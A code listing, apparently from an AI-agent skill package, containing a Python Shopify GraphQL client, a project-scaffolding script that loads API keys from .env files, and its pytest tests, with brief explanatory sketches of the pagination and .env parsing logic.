            variables: Query variables

        Returns:
            GraphQLResponse object
        """
        payload = {"query": query}
        if variables:
            payload["variables"] = variables

        headers = {
            "Content-Type": "application/json",
            "X-Shopify-Access-Token": self.access_token
        }

        for attempt in range(MAX_RETRIES):
            try:
                request = Request(
                    self.base_url,
                    data=json.dumps(payload).encode('utf-8'),
                    headers=headers,
                    method='POST'
                )

                with urlopen(request, timeout=30) as response:
                    result = json.loads(response.read().decode('utf-8'))
                    return GraphQLResponse(
                        data=result.get('data'),
                        errors=result.get('errors'),
                        extensions=result.get('extensions')
                    )

            except HTTPError as e:
                if e.code == 429:  # Rate limited
                    delay = RETRY_DELAY * (2 ** attempt)
                    print(f"Rate limited. Retrying in {delay}s...")
                    time.sleep(delay)
                    continue
                raise
            except Exception:
                if attempt == MAX_RETRIES - 1:
                    raise
                time.sleep(RETRY_DELAY)

        return GraphQLResponse(errors=[{"message": "Max retries exceeded"}])

    # ==================== Query Templates ====================

    def get_products(
        self,
        first: int = 10,
        query: Optional[str] = None,
        after: Optional[str] = None
    ) -> GraphQLResponse:
        """
        Query products with pagination.

        Args:
            first: Number of products to fetch (max 250)
            query: Optional search query
            after: Cursor for pagination
        """
        gql = """
        query GetProducts($first: Int!, $query: String, $after: String) {
          products(first: $first, query: $query, after: $after) {
            edges {
              node {
                id
                title
                handle
                status
                totalInventory
                variants(first: 5) {
                  edges {
                    node {
                      id
                      title
                      price
                      inventoryQuantity
                      sku
                    }
                  }
                }
              }
              cursor
            }
            pageInfo {
              hasNextPage
              endCursor
            }
          }
        }
        """
        return self.execute(gql, {"first": first, "query": query, "after": after})

    def get_orders(
        self,
        first: int = 10,
        query: Optional[str] = None,
        after: Optional[str] = None
    ) -> GraphQLResponse:
        """
        Query orders with pagination.

        Args:
            first: Number of orders to fetch (max 250)
            query: Optional search query (e.g., "financial_status:paid")
            after: Cursor for pagination
        """
        gql = """
        query GetOrders($first: Int!, $query: String, $after: String) {
          orders(first: $first, query: $query, after: $after) {
            edges {
              node {
                id
                name
                createdAt
                displayFinancialStatus
                displayFulfillmentStatus
                totalPriceSet {
                  shopMoney { amount currencyCode }
                }
                customer {
                  id
                  firstName
                  lastName
                }
                lineItems(first: 5) {
                  edges {
                    node {
                      title
                      quantity
                    }
                  }
                }
              }
              cursor
            }
            pageInfo {
              hasNextPage
              endCursor
            }
          }
        }
        """
        return self.execute(gql, {"first": first, "query": query, "after": after})

    def get_customers(
        self,
        first: int = 10,
        query: Optional[str] = None,
        after: Optional[str] = None
    ) -> GraphQLResponse:
        """
        Query customers with pagination.

        Args:
            first: Number of customers to fetch (max 250)
            query: Optional search query
            after: Cursor for pagination
        """
        gql = """
        query GetCustomers($first: Int!, $query: String, $after: String) {
          customers(first: $first, query: $query, after: $after) {
            edges {
              node {
                id
                firstName
                lastName
                displayName
                defaultEmailAddress {
                  emailAddress
                }
                numberOfOrders
                amountSpent {
                  amount
                  currencyCode
                }
              }
              cursor
            }
            pageInfo {
              hasNextPage
              endCursor
            }
          }
        }
        """
        return self.execute(gql, {"first": first, "query": query, "after": after})

    def set_metafields(self, metafields: List[Dict]) -> GraphQLResponse:
        """
        Set metafields on resources.

        Args:
            metafields: List of metafield inputs, each containing:
                - ownerId: Resource GID
                - namespace: Metafield namespace
                - key: Metafield key
                - value: Metafield value
                - type: Metafield type
        """
        gql = """
        mutation SetMetafields($metafields: [MetafieldsSetInput!]!) {
          metafieldsSet(metafields: $metafields) {
            metafields {
              id
              namespace
              key
              value
            }
            userErrors {
              field
              message
            }
          }
        }
        """
        return self.execute(gql, {"metafields": metafields})

    # ==================== Pagination Helpers ====================

    def paginate_products(
        self,
        batch_size: int = 50,
        query: Optional[str] = None
    ) -> Generator[Dict, None, None]:
        """
        Generator that yields all products with automatic pagination.

        Args:
            batch_size: Products per request (max 250)
            query: Optional search query

        Yields:
            Product dictionaries
        """
        cursor = None
        while True:
            response = self.get_products(first=batch_size, query=query, after=cursor)

            if not response.is_success or not response.data:
                break

            products = response.data.get('products', {})
            edges = products.get('edges', [])

            for edge in edges:
                yield edge['node']

            page_info = products.get('pageInfo', {})
            if not page_info.get('hasNextPage'):
                break

            cursor = page_info.get('endCursor')

    def paginate_orders(
        self,
        batch_size: int = 50,
        query: Optional[str] = None
    ) -> Generator[Dict, None, None]:
        """
        Generator that yields all orders with automatic pagination.

        Args:
            batch_size: Orders per request (max 250)
            query: Optional search query

        Yields:
            Order dictionaries
        """
        cursor = None
        while True:
            response = self.get_orders(first=batch_size, query=query, after=cursor)

            if not response.is_success or not response.data:
                break

            orders = response.data.get('orders', {})
            edges = orders.get('edges', [])

            for edge in edges:
                yield edge['node']

            page_info = orders.get('pageInfo', {})
            if not page_info.get('hasNextPage'):
                break

            cursor = page_info.get('endCursor')


# ==================== Utility Functions ====================

def extract_id(gid: str) -> str:
    """
    Extract numeric ID from Shopify GID.

    Args:
        gid: Global ID (e.g., 'gid://shopify/Product/123')

    Returns:
        Numeric ID string (e.g., '123')
    """
    return gid.split('/')[-1] if gid else ''


def build_gid(resource_type: str, id: str) -> str:
    """
    Build Shopify GID from resource type and ID.

    Args:
        resource_type: Resource type (e.g., 'Product', 'Order')
        id: Numeric ID

    Returns:
        Global ID (e.g., 'gid://shopify/Product/123')
    """
    return f"gid://shopify/{resource_type}/{id}"


# ==================== Example Usage ====================

def main():
    """Example usage of ShopifyGraphQL client."""
    # Load from environment
    shop = os.environ.get('SHOP_DOMAIN', 'your-store.myshopify.com')
    token = os.environ.get('SHOPIFY_ACCESS_TOKEN', '')

    if not token:
        print("Set SHOPIFY_ACCESS_TOKEN environment variable")
        return

    client = ShopifyGraphQL(shop, token)

    # Example: Get first 5 products
    print("Fetching products...")
    response = client.get_products(first=5)

    if response.is_success:
        products = response.data['products']['edges']
        for edge in products:
            product = edge['node']
            print(f"  - {product['title']} ({product['status']})")
        print(f"\nQuery cost: {response.query_cost}")
    else:
        print(f"Errors: {response.errors}")


if __name__ == '__main__':
    main()
```
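The two pagination helpers above share one cursor-following loop. That loop can be exercised in isolation; here is a self-contained sketch with the API call stubbed out (the page data below is fabricated for illustration, not real Admin API output):

```python
from typing import Dict, Generator, Optional

# Fabricated two-page dataset standing in for the Admin API response shape.
PAGES = {
    None: {"edges": [{"node": {"id": 1}}, {"node": {"id": 2}}],
           "pageInfo": {"hasNextPage": True, "endCursor": "c2"}},
    "c2": {"edges": [{"node": {"id": 3}}],
           "pageInfo": {"hasNextPage": False, "endCursor": "c3"}},
}

def fetch_page(after: Optional[str]) -> Dict:
    """Stub playing the role of client.get_products(...).data['products']."""
    return PAGES[after]

def paginate(fetch) -> Generator[Dict, None, None]:
    """Yield nodes across pages, following endCursor until exhausted."""
    cursor = None
    while True:
        page = fetch(cursor)
        for edge in page.get("edges", []):
            yield edge["node"]
        info = page.get("pageInfo", {})
        if not info.get("hasNextPage"):
            break
        cursor = info.get("endCursor")

ids = [node["id"] for node in paginate(fetch_page)]
print(ids)  # → [1, 2, 3]
```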
**skills/shopify-development/scripts/shopify_init.py** (new file, 441 lines)
````python
#!/usr/bin/env python3
"""
Shopify Project Initialization Script

Interactive script to scaffold Shopify apps, extensions, or themes.
Supports environment variable loading from multiple locations.
"""

import os
import sys
import json
import subprocess
from pathlib import Path
from typing import Dict, Optional, List
from dataclasses import dataclass


@dataclass
class EnvConfig:
    """Environment configuration container."""
    shopify_api_key: Optional[str] = None
    shopify_api_secret: Optional[str] = None
    shop_domain: Optional[str] = None
    scopes: Optional[str] = None


class EnvLoader:
    """Load environment variables from multiple sources in priority order."""

    @staticmethod
    def load_env_file(filepath: Path) -> Dict[str, str]:
        """
        Load environment variables from .env file.

        Args:
            filepath: Path to .env file

        Returns:
            Dictionary of environment variables
        """
        env_vars = {}
        if not filepath.exists():
            return env_vars

        try:
            with open(filepath, 'r') as f:
                for line in f:
                    line = line.strip()
                    if line and not line.startswith('#') and '=' in line:
                        key, value = line.split('=', 1)
                        env_vars[key.strip()] = value.strip().strip('"').strip("'")
        except Exception as e:
            print(f"Warning: Failed to load {filepath}: {e}")

        return env_vars

    @staticmethod
    def get_env_paths(skill_dir: Path) -> List[Path]:
        """
        Get list of .env file paths in priority order.

        Works with any AI tool directory structure:
        - .agent/skills/ (universal)
        - .claude/skills/ (Claude Code)
        - .gemini/skills/ (Gemini CLI)
        - .cursor/skills/ (Cursor)

        Priority: process.env > skill/.env > skills/.env > agent_dir/.env

        Args:
            skill_dir: Path to skill directory

        Returns:
            List of .env file paths
        """
        paths = []

        # skill/.env
        skill_env = skill_dir / '.env'
        if skill_env.exists():
            paths.append(skill_env)

        # skills/.env
        skills_env = skill_dir.parent / '.env'
        if skills_env.exists():
            paths.append(skills_env)

        # agent_dir/.env (e.g., .agent, .claude, .gemini, .cursor)
        agent_env = skill_dir.parent.parent / '.env'
        if agent_env.exists():
            paths.append(agent_env)

        return paths

    @staticmethod
    def load_config(skill_dir: Path) -> EnvConfig:
        """
        Load configuration from environment variables.

        Works with any AI tool directory structure.
        Priority: process.env > skill/.env > skills/.env > agent_dir/.env

        Args:
            skill_dir: Path to skill directory

        Returns:
            EnvConfig object
        """
        config = EnvConfig()

        # Load from .env files (reverse priority order)
        for env_path in reversed(EnvLoader.get_env_paths(skill_dir)):
            env_vars = EnvLoader.load_env_file(env_path)
            if 'SHOPIFY_API_KEY' in env_vars:
                config.shopify_api_key = env_vars['SHOPIFY_API_KEY']
            if 'SHOPIFY_API_SECRET' in env_vars:
                config.shopify_api_secret = env_vars['SHOPIFY_API_SECRET']
            if 'SHOP_DOMAIN' in env_vars:
                config.shop_domain = env_vars['SHOP_DOMAIN']
            if 'SCOPES' in env_vars:
                config.scopes = env_vars['SCOPES']

        # Override with process environment (highest priority)
        if 'SHOPIFY_API_KEY' in os.environ:
            config.shopify_api_key = os.environ['SHOPIFY_API_KEY']
        if 'SHOPIFY_API_SECRET' in os.environ:
            config.shopify_api_secret = os.environ['SHOPIFY_API_SECRET']
        if 'SHOP_DOMAIN' in os.environ:
            config.shop_domain = os.environ['SHOP_DOMAIN']
        if 'SCOPES' in os.environ:
            config.scopes = os.environ['SCOPES']

        return config


class ShopifyInitializer:
    """Initialize Shopify projects."""

    def __init__(self, config: EnvConfig):
        """
        Initialize ShopifyInitializer.

        Args:
            config: Environment configuration
        """
        self.config = config

    def prompt(self, message: str, default: Optional[str] = None) -> str:
        """
        Prompt user for input.

        Args:
            message: Prompt message
            default: Default value

        Returns:
            User input or default
        """
        if default:
            message = f"{message} [{default}]"
        user_input = input(f"{message}: ").strip()
        return user_input if user_input else (default or '')

    def select_option(self, message: str, options: List[str]) -> str:
        """
        Prompt user to select from options.

        Args:
            message: Prompt message
            options: List of options

        Returns:
            Selected option
        """
        print(f"\n{message}")
        for i, option in enumerate(options, 1):
            print(f"{i}. {option}")

        while True:
            try:
                choice = int(input("Select option: ").strip())
                if 1 <= choice <= len(options):
                    return options[choice - 1]
                print(f"Please select 1-{len(options)}")
            except (ValueError, KeyboardInterrupt):
                print("Invalid input")

    def check_cli_installed(self) -> bool:
        """
        Check if Shopify CLI is installed.

        Returns:
            True if installed, False otherwise
        """
        try:
            result = subprocess.run(
                ['shopify', 'version'],
                capture_output=True,
                text=True,
                timeout=5
            )
            return result.returncode == 0
        except (subprocess.SubprocessError, FileNotFoundError):
            return False

    def create_app_config(self, project_dir: Path, app_name: str, scopes: str) -> None:
        """
        Create shopify.app.toml configuration file.

        Args:
            project_dir: Project directory
            app_name: Application name
            scopes: Access scopes
        """
        config_content = f"""# Shopify App Configuration
name = "{app_name}"
client_id = "{self.config.shopify_api_key or 'YOUR_API_KEY'}"
application_url = "https://your-app.com"
embedded = true

[build]
automatically_update_urls_on_dev = true
dev_store_url = "{self.config.shop_domain or 'your-store.myshopify.com'}"

[access_scopes]
scopes = "{scopes}"

[webhooks]
api_version = "2026-01"

[[webhooks.subscriptions]]
topics = ["app/uninstalled"]
uri = "/webhooks/app/uninstalled"

[webhooks.privacy_compliance]
customer_data_request_url = "/webhooks/gdpr/data-request"
customer_deletion_url = "/webhooks/gdpr/customer-deletion"
shop_deletion_url = "/webhooks/gdpr/shop-deletion"
"""
        config_path = project_dir / 'shopify.app.toml'
        config_path.write_text(config_content)
        print(f"✓ Created {config_path}")

    def create_extension_config(self, project_dir: Path, extension_name: str, extension_type: str) -> None:
        """
        Create shopify.extension.toml configuration file.

        Args:
            project_dir: Project directory
            extension_name: Extension name
            extension_type: Extension type
        """
        target_map = {
            'checkout': 'purchase.checkout.block.render',
            'admin_action': 'admin.product-details.action.render',
            'admin_block': 'admin.product-details.block.render',
            'pos': 'pos.home.tile.render',
            'function': 'function',
            'customer_account': 'customer-account.order-status.block.render',
            'theme_app': 'theme-app-extension'
        }

        config_content = f"""name = "{extension_name}"
type = "ui_extension"
handle = "{extension_name.lower().replace(' ', '-')}"

[extension_points]
api_version = "2026-01"

[[extension_points.targets]]
target = "{target_map.get(extension_type, 'purchase.checkout.block.render')}"

[capabilities]
network_access = true
api_access = true
"""
        config_path = project_dir / 'shopify.extension.toml'
        config_path.write_text(config_content)
        print(f"✓ Created {config_path}")

    def create_readme(self, project_dir: Path, project_type: str, project_name: str) -> None:
        """
        Create README.md file.

        Args:
            project_dir: Project directory
            project_type: Project type (app/extension/theme)
            project_name: Project name
        """
        content = f"""# {project_name}

Shopify {project_type.capitalize()} project.

## Setup

```bash
# Install dependencies
npm install

# Start development
shopify {project_type} dev
```

## Deployment

```bash
# Deploy to Shopify
shopify {project_type} deploy
```

## Resources

- [Shopify Documentation](https://shopify.dev/docs)
- [Shopify CLI](https://shopify.dev/docs/api/shopify-cli)
"""
        readme_path = project_dir / 'README.md'
        readme_path.write_text(content)
        print(f"✓ Created {readme_path}")

    def init_app(self) -> None:
        """Initialize Shopify app project."""
        print("\n=== Shopify App Initialization ===\n")

        app_name = self.prompt("App name", "my-shopify-app")
        scopes = self.prompt("Access scopes", self.config.scopes or "read_products,write_products")

        project_dir = Path.cwd() / app_name
        project_dir.mkdir(exist_ok=True)

        print(f"\nCreating app in {project_dir}...")

        self.create_app_config(project_dir, app_name, scopes)
        self.create_readme(project_dir, "app", app_name)

        # Create basic package.json
        package_json = {
            "name": app_name.lower().replace(' ', '-'),
            "version": "1.0.0",
            "scripts": {
                "dev": "shopify app dev",
                "deploy": "shopify app deploy"
            }
        }
        (project_dir / 'package.json').write_text(json.dumps(package_json, indent=2))
        print("✓ Created package.json")

        print(f"\n✓ App '{app_name}' initialized successfully!")
        print("\nNext steps:")
        print(f"  cd {app_name}")
        print("  npm install")
        print("  shopify app dev")

    def init_extension(self) -> None:
        """Initialize Shopify extension project."""
        print("\n=== Shopify Extension Initialization ===\n")

        extension_types = [
            'checkout',
            'admin_action',
            'admin_block',
            'pos',
            'function',
            'customer_account',
            'theme_app'
        ]
        extension_type = self.select_option("Select extension type", extension_types)

        extension_name = self.prompt("Extension name", "my-extension")

        project_dir = Path.cwd() / extension_name
        project_dir.mkdir(exist_ok=True)

        print(f"\nCreating extension in {project_dir}...")

        self.create_extension_config(project_dir, extension_name, extension_type)
        self.create_readme(project_dir, "extension", extension_name)

        print(f"\n✓ Extension '{extension_name}' initialized successfully!")
        print("\nNext steps:")
        print(f"  cd {extension_name}")
        print("  shopify app dev")

    def init_theme(self) -> None:
        """Initialize Shopify theme project."""
        print("\n=== Shopify Theme Initialization ===\n")

        theme_name = self.prompt("Theme name", "my-theme")

        print(f"\nInitializing theme '{theme_name}'...")
        print("\nRecommended: Use 'shopify theme init' for full theme scaffolding")
        print(f"\nRun: shopify theme init {theme_name}")

    def run(self) -> None:
        """Run interactive initialization."""
        print("=" * 60)
        print("Shopify Project Initializer")
        print("=" * 60)

        # Check CLI
        if not self.check_cli_installed():
            print("\n⚠ Shopify CLI not found!")
            print("Install: npm install -g @shopify/cli@latest")
            sys.exit(1)

        # Select project type
        project_types = ['app', 'extension', 'theme']
        project_type = self.select_option("Select project type", project_types)

        # Initialize based on type
        if project_type == 'app':
            self.init_app()
        elif project_type == 'extension':
            self.init_extension()
        elif project_type == 'theme':
            self.init_theme()


def main() -> None:
    """Main entry point."""
    try:
        # Get skill directory
        script_dir = Path(__file__).parent
        skill_dir = script_dir.parent

        # Load configuration
        config = EnvLoader.load_config(skill_dir)

        # Initialize project
        initializer = ShopifyInitializer(config)
        initializer.run()

    except KeyboardInterrupt:
        print("\n\nAborted.")
        sys.exit(0)
    except Exception as e:
        print(f"\n✗ Error: {e}", file=sys.stderr)
        sys.exit(1)


if __name__ == '__main__':
    main()
````
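The `.env` parsing rules used by `EnvLoader.load_env_file` (skip blanks and `#` comments, split on the first `=`, strip surrounding quotes) can be checked in isolation. A self-contained sketch reproducing just that logic on an in-memory string:

```python
def parse_env(text: str) -> dict:
    """Parse .env-style text: KEY=VALUE lines, '#' comments, quotes stripped."""
    env = {}
    for line in text.splitlines():
        line = line.strip()
        # Skip blank lines, comments, and lines without a '=' separator
        if line and not line.startswith('#') and '=' in line:
            key, value = line.split('=', 1)
            env[key.strip()] = value.strip().strip('"').strip("'")
    return env

sample = '''
# credentials
SHOPIFY_API_KEY="abc123"
SHOP_DOMAIN=test.myshopify.com
not a kv line
'''
print(parse_env(sample))  # → {'SHOPIFY_API_KEY': 'abc123', 'SHOP_DOMAIN': 'test.myshopify.com'}
```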
**skills/shopify-development/scripts/tests/test_shopify_init.py** (new file, 379 lines; truncated below)

```python
"""
Tests for shopify_init.py

Run with: pytest test_shopify_init.py -v --cov=shopify_init --cov-report=term-missing
"""

import os
import sys
import json
import pytest
import subprocess
from pathlib import Path
from unittest.mock import Mock, patch, mock_open, MagicMock

sys.path.insert(0, str(Path(__file__).parent.parent))

from shopify_init import EnvLoader, EnvConfig, ShopifyInitializer


class TestEnvLoader:
    """Test EnvLoader class."""

    def test_load_env_file_success(self, tmp_path):
        """Test loading valid .env file."""
        env_file = tmp_path / ".env"
        env_file.write_text("""
SHOPIFY_API_KEY=test_key
SHOPIFY_API_SECRET=test_secret
SHOP_DOMAIN=test.myshopify.com
# Comment line
SCOPES=read_products,write_products
""")

        result = EnvLoader.load_env_file(env_file)

        assert result['SHOPIFY_API_KEY'] == 'test_key'
        assert result['SHOPIFY_API_SECRET'] == 'test_secret'
        assert result['SHOP_DOMAIN'] == 'test.myshopify.com'
        assert result['SCOPES'] == 'read_products,write_products'

    def test_load_env_file_with_quotes(self, tmp_path):
        """Test loading .env file with quoted values."""
        env_file = tmp_path / ".env"
        env_file.write_text("""
SHOPIFY_API_KEY="test_key"
SHOPIFY_API_SECRET='test_secret'
""")

        result = EnvLoader.load_env_file(env_file)

        assert result['SHOPIFY_API_KEY'] == 'test_key'
        assert result['SHOPIFY_API_SECRET'] == 'test_secret'

    def test_load_env_file_nonexistent(self, tmp_path):
        """Test loading non-existent .env file."""
        result = EnvLoader.load_env_file(tmp_path / "nonexistent.env")
        assert result == {}

    def test_load_env_file_invalid_format(self, tmp_path):
        """Test loading .env file with invalid lines."""
```
env_file = tmp_path / ".env"
|
||||
env_file.write_text("""
|
||||
VALID_KEY=value
|
||||
INVALID_LINE_NO_EQUALS
|
||||
ANOTHER_VALID=test
|
||||
""")
|
||||
|
||||
result = EnvLoader.load_env_file(env_file)
|
||||
|
||||
assert result['VALID_KEY'] == 'value'
|
||||
assert result['ANOTHER_VALID'] == 'test'
|
||||
assert 'INVALID_LINE_NO_EQUALS' not in result
|
||||
|
||||
def test_get_env_paths(self, tmp_path):
|
||||
"""Test getting .env file paths from universal directory structure."""
|
||||
# Create directory structure (works with .agent, .claude, .gemini, .cursor)
|
||||
agent_dir = tmp_path / ".agent"
|
||||
skills_dir = agent_dir / "skills"
|
||||
skill_dir = skills_dir / "shopify"
|
||||
|
||||
skill_dir.mkdir(parents=True)
|
||||
|
||||
# Create .env files at each level
|
||||
(skill_dir / ".env").write_text("SKILL=1")
|
||||
(skills_dir / ".env").write_text("SKILLS=1")
|
||||
(agent_dir / ".env").write_text("AGENT=1")
|
||||
|
||||
paths = EnvLoader.get_env_paths(skill_dir)
|
||||
|
||||
assert len(paths) == 3
|
||||
assert skill_dir / ".env" in paths
|
||||
assert skills_dir / ".env" in paths
|
||||
assert agent_dir / ".env" in paths
|
||||
|
||||
def test_load_config_priority(self, tmp_path, monkeypatch):
|
||||
"""Test configuration loading priority across different AI tool directories."""
|
||||
skill_dir = tmp_path / "skill"
|
||||
skills_dir = tmp_path
|
||||
agent_dir = tmp_path.parent # Could be .agent, .claude, .gemini, .cursor
|
||||
|
||||
skill_dir.mkdir(parents=True)
|
||||
|
||||
(skill_dir / ".env").write_text("SHOPIFY_API_KEY=skill_key")
|
||||
(skills_dir / ".env").write_text("SHOPIFY_API_KEY=skills_key\nSHOP_DOMAIN=skills.myshopify.com")
|
||||
|
||||
monkeypatch.setenv("SHOPIFY_API_KEY", "process_key")
|
||||
|
||||
config = EnvLoader.load_config(skill_dir)
|
||||
|
||||
assert config.shopify_api_key == "process_key"
|
||||
# Shop domain from skills/.env
|
||||
assert config.shop_domain == "skills.myshopify.com"
|
||||
|
||||
def test_load_config_no_files(self, tmp_path):
|
||||
"""Test configuration loading with no .env files."""
|
||||
config = EnvLoader.load_config(tmp_path)
|
||||
|
||||
assert config.shopify_api_key is None
|
||||
assert config.shopify_api_secret is None
|
||||
assert config.shop_domain is None
|
||||
assert config.scopes is None
|
||||
|
||||
|
||||
class TestShopifyInitializer:
|
||||
"""Test ShopifyInitializer class."""
|
||||
|
||||
@pytest.fixture
|
||||
def config(self):
|
||||
"""Create test config."""
|
||||
return EnvConfig(
|
||||
shopify_api_key="test_key",
|
||||
shopify_api_secret="test_secret",
|
||||
shop_domain="test.myshopify.com",
|
||||
scopes="read_products,write_products"
|
||||
)
|
||||
|
||||
@pytest.fixture
|
||||
def initializer(self, config):
|
||||
"""Create initializer instance."""
|
||||
return ShopifyInitializer(config)
|
||||
|
||||
def test_prompt_with_default(self, initializer):
|
||||
"""Test prompt with default value."""
|
||||
with patch('builtins.input', return_value=''):
|
||||
result = initializer.prompt("Test", "default_value")
|
||||
assert result == "default_value"
|
||||
|
||||
def test_prompt_with_input(self, initializer):
|
||||
"""Test prompt with user input."""
|
||||
with patch('builtins.input', return_value='user_input'):
|
||||
result = initializer.prompt("Test", "default_value")
|
||||
assert result == "user_input"
|
||||
|
||||
def test_select_option_valid(self, initializer):
|
||||
"""Test select option with valid choice."""
|
||||
options = ['app', 'extension', 'theme']
|
||||
with patch('builtins.input', return_value='2'):
|
||||
result = initializer.select_option("Choose", options)
|
||||
assert result == 'extension'
|
||||
|
||||
def test_select_option_invalid_then_valid(self, initializer):
|
||||
"""Test select option with invalid then valid choice."""
|
||||
options = ['app', 'extension']
|
||||
with patch('builtins.input', side_effect=['5', 'invalid', '1']):
|
||||
result = initializer.select_option("Choose", options)
|
||||
assert result == 'app'
|
||||
|
||||
def test_check_cli_installed_success(self, initializer):
|
||||
"""Test CLI installed check - success."""
|
||||
mock_result = Mock()
|
||||
mock_result.returncode = 0
|
||||
|
||||
with patch('subprocess.run', return_value=mock_result):
|
||||
assert initializer.check_cli_installed() is True
|
||||
|
||||
def test_check_cli_installed_failure(self, initializer):
|
||||
"""Test CLI installed check - failure."""
|
||||
with patch('subprocess.run', side_effect=FileNotFoundError):
|
||||
assert initializer.check_cli_installed() is False
|
||||
|
||||
def test_create_app_config(self, initializer, tmp_path):
|
||||
"""Test creating app configuration file."""
|
||||
initializer.create_app_config(tmp_path, "test-app", "read_products")
|
||||
|
||||
config_file = tmp_path / "shopify.app.toml"
|
||||
assert config_file.exists()
|
||||
|
||||
content = config_file.read_text()
|
||||
assert 'name = "test-app"' in content
|
||||
assert 'scopes = "read_products"' in content
|
||||
assert 'client_id = "test_key"' in content
|
||||
|
||||
def test_create_extension_config(self, initializer, tmp_path):
|
||||
"""Test creating extension configuration file."""
|
||||
initializer.create_extension_config(tmp_path, "test-ext", "checkout")
|
||||
|
||||
config_file = tmp_path / "shopify.extension.toml"
|
||||
assert config_file.exists()
|
||||
|
||||
content = config_file.read_text()
|
||||
assert 'name = "test-ext"' in content
|
||||
assert 'purchase.checkout.block.render' in content
|
||||
|
||||
def test_create_extension_config_admin_action(self, initializer, tmp_path):
|
||||
"""Test creating admin action extension config."""
|
||||
initializer.create_extension_config(tmp_path, "admin-ext", "admin_action")
|
||||
|
||||
config_file = tmp_path / "shopify.extension.toml"
|
||||
content = config_file.read_text()
|
||||
assert 'admin.product-details.action.render' in content
|
||||
|
||||
def test_create_readme(self, initializer, tmp_path):
|
||||
"""Test creating README file."""
|
||||
initializer.create_readme(tmp_path, "app", "Test App")
|
||||
|
||||
readme_file = tmp_path / "README.md"
|
||||
assert readme_file.exists()
|
||||
|
||||
content = readme_file.read_text()
|
||||
assert '# Test App' in content
|
||||
assert 'shopify app dev' in content
|
||||
|
||||
@patch('builtins.input')
|
||||
@patch('builtins.print')
|
||||
def test_init_app(self, mock_print, mock_input, initializer, tmp_path, monkeypatch):
|
||||
"""Test app initialization."""
|
||||
monkeypatch.chdir(tmp_path)
|
||||
|
||||
# Mock user inputs
|
||||
mock_input.side_effect = ['my-app', 'read_products,write_products']
|
||||
|
||||
initializer.init_app()
|
||||
|
||||
# Check directory created
|
||||
app_dir = tmp_path / "my-app"
|
||||
assert app_dir.exists()
|
||||
|
||||
# Check files created
|
||||
assert (app_dir / "shopify.app.toml").exists()
|
||||
assert (app_dir / "README.md").exists()
|
||||
assert (app_dir / "package.json").exists()
|
||||
|
||||
# Check package.json content
|
||||
package_json = json.loads((app_dir / "package.json").read_text())
|
||||
assert package_json['name'] == 'my-app'
|
||||
assert 'dev' in package_json['scripts']
|
||||
|
||||
@patch('builtins.input')
|
||||
@patch('builtins.print')
|
||||
def test_init_extension(self, mock_print, mock_input, initializer, tmp_path, monkeypatch):
|
||||
"""Test extension initialization."""
|
||||
monkeypatch.chdir(tmp_path)
|
||||
|
||||
# Mock user inputs: type selection (1 = checkout), name
|
||||
mock_input.side_effect = ['1', 'my-extension']
|
||||
|
||||
initializer.init_extension()
|
||||
|
||||
# Check directory and files created
|
||||
ext_dir = tmp_path / "my-extension"
|
||||
assert ext_dir.exists()
|
||||
assert (ext_dir / "shopify.extension.toml").exists()
|
||||
assert (ext_dir / "README.md").exists()
|
||||
|
||||
@patch('builtins.input')
|
||||
@patch('builtins.print')
|
||||
def test_init_theme(self, mock_print, mock_input, initializer):
|
||||
"""Test theme initialization."""
|
||||
mock_input.return_value = 'my-theme'
|
||||
|
||||
initializer.init_theme()
|
||||
|
||||
assert mock_print.called
|
||||
|
||||
@patch('builtins.print')
|
||||
def test_run_no_cli(self, mock_print, initializer):
|
||||
"""Test run when CLI not installed."""
|
||||
with patch.object(initializer, 'check_cli_installed', return_value=False):
|
||||
with pytest.raises(SystemExit) as exc_info:
|
||||
initializer.run()
|
||||
assert exc_info.value.code == 1
|
||||
|
||||
@patch.object(ShopifyInitializer, 'check_cli_installed', return_value=True)
|
||||
@patch.object(ShopifyInitializer, 'init_app')
|
||||
@patch('builtins.input')
|
||||
@patch('builtins.print')
|
||||
def test_run_app_selected(self, mock_print, mock_input, mock_init_app, mock_cli_check, initializer):
|
||||
"""Test run with app selection."""
|
||||
mock_input.return_value = '1' # Select app
|
||||
|
||||
initializer.run()
|
||||
|
||||
mock_init_app.assert_called_once()
|
||||
|
||||
@patch.object(ShopifyInitializer, 'check_cli_installed', return_value=True)
|
||||
@patch.object(ShopifyInitializer, 'init_extension')
|
||||
@patch('builtins.input')
|
||||
@patch('builtins.print')
|
||||
def test_run_extension_selected(self, mock_print, mock_input, mock_init_ext, mock_cli_check, initializer):
|
||||
"""Test run with extension selection."""
|
||||
mock_input.return_value = '2' # Select extension
|
||||
|
||||
initializer.run()
|
||||
|
||||
mock_init_ext.assert_called_once()
|
||||
|
||||
|
||||
class TestMain:
|
||||
"""Test main function."""
|
||||
|
||||
@patch('shopify_init.ShopifyInitializer')
|
||||
@patch('shopify_init.EnvLoader')
|
||||
def test_main_success(self, mock_loader, mock_initializer):
|
||||
"""Test main function success path."""
|
||||
from shopify_init import main
|
||||
|
||||
mock_config = Mock()
|
||||
mock_loader.load_config.return_value = mock_config
|
||||
|
||||
mock_init_instance = Mock()
|
||||
mock_initializer.return_value = mock_init_instance
|
||||
|
||||
with patch('builtins.print'):
|
||||
main()
|
||||
|
||||
mock_init_instance.run.assert_called_once()
|
||||
|
||||
@patch('shopify_init.ShopifyInitializer')
|
||||
@patch('sys.exit')
|
||||
def test_main_keyboard_interrupt(self, mock_exit, mock_initializer):
|
||||
"""Test main function with keyboard interrupt."""
|
||||
from shopify_init import main
|
||||
|
||||
mock_initializer.return_value.run.side_effect = KeyboardInterrupt
|
||||
|
||||
with patch('builtins.print'):
|
||||
main()
|
||||
|
||||
mock_exit.assert_called_with(0)
|
||||
|
||||
@patch('shopify_init.ShopifyInitializer')
|
||||
@patch('sys.exit')
|
||||
def test_main_exception(self, mock_exit, mock_initializer):
|
||||
"""Test main function with exception."""
|
||||
from shopify_init import main
|
||||
|
||||
mock_initializer.return_value.run.side_effect = Exception("Test error")
|
||||
|
||||
with patch('builtins.print'):
|
||||
main()
|
||||
|
||||
mock_exit.assert_called_with(1)
|
||||
|
||||
|
||||
class TestEnvConfig:
|
||||
"""Test EnvConfig dataclass."""
|
||||
|
||||
def test_env_config_defaults(self):
|
||||
"""Test EnvConfig default values."""
|
||||
config = EnvConfig()
|
||||
|
||||
assert config.shopify_api_key is None
|
||||
assert config.shopify_api_secret is None
|
||||
assert config.shop_domain is None
|
||||
assert config.scopes is None
|
||||
|
||||
def test_env_config_with_values(self):
|
||||
"""Test EnvConfig with values."""
|
||||
config = EnvConfig(
|
||||
shopify_api_key="key",
|
||||
shopify_api_secret="secret",
|
||||
shop_domain="test.myshopify.com",
|
||||
